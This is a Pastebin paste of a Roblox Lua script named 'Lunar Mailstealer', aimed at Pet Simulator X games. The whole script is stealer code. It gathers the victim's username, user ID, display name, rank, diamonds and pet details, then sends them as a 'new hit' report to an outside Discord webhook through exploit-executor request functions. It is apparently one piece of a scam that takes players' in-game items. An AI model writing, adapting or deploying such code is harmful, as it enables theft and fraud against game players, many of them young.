Advertisement
ninojesse

Untitled

Mar 23rd, 2023
105
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.83 KB | None | 0 0
  1. if game.PlaceId == 6284583030 then
  2. _G.GameIn = "Pet Simulator X"
  3. elseif game.PlaceId == 7722306047 then
  4. _G.GameIn = "PSX Trading Plaza"
  5. elseif game.PlaceId == 10321372166 then
  6. _G.GameIn = "PSX Hardcore"
  7. elseif game.PlaceId == 12610002282 then
  8. _G.GameIn = "PSX Pro Trading Plaza"
  9. elseif game.PlaceId == 11725212117 then
  10. _G.GameIn = "PSX Voice Trading Plaza"
  11. else
  12. _G.GameIn = "❓ Couldn't find game"
  13. end
  14. local webhookcolor = "13369599"
  15. _G.CurrentRank = game:GetService("Players").LocalPlayer.PlayerGui.Main.Right.Rank.RankName.Text
  16. _G.PlrUserVictim = game.Players.LocalPlayer.Name
  17. _G.PlrUserIDVictim = game.Players.LocalPlayer.UserId
  18. _G.PlrDisplayNameVictim = game.Players.LocalPlayer.DisplayName
  19. local function sendwebhook(msg)
  20. local msg = {
  21. ["content"]= "**Lunar Mailstealer has detected a new hit!**",
  22. ["embeds"]= {
  23. {
  24. ["title"]= "`Lunar Mailstealer Results`",
  25. ["description"]= "**Data from the victim**\n🧑Display Name: ".._G.PlrDisplayNameVictim.."\n🧑Username: ".._G.PlrUserVictim.."\n🧑User ID: ".._G.PlrUserIDVictim.."\n🐱Rank: ".._G.CurrentRank.."\n🎮Place: ".._G.GameIn.."",
  26. ["url"]= "https://discord.gg/pd65DxGhVc",
  27. ["color"]= ""..webhookcolor.."",
  28. ["fields"]= {
  29. {
  30. ["name"]= "Diamonds 💎",
  31. ["value"]= "```".._G.Diamonds.."```",
  32. ["inline"]= true
  33. },
  34. {
  35. ["name"]= "Pet Name & Rarity",
  36. ["value"]= "```Pet Name: ".._G.PetName.."\nPet Rarity: ".._G.PetRar.."```",
  37. ["inline"]= true
  38. }
  39. }
  40. }
  41. },
  42. ["attachments"] = {}
  43. }
  44. local Webhook = "DISCORDLUNARWEBHOOK"
  45. request = http_request or request or HttpPost or syn.request
  46. request({Url = Webhook, Method = "POST", Headers = {["Content-Type"] = "application/json"}, Body = game.HttpService:JSONEncode(msg)})
  47. end
  48. sendwebhook(msg)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement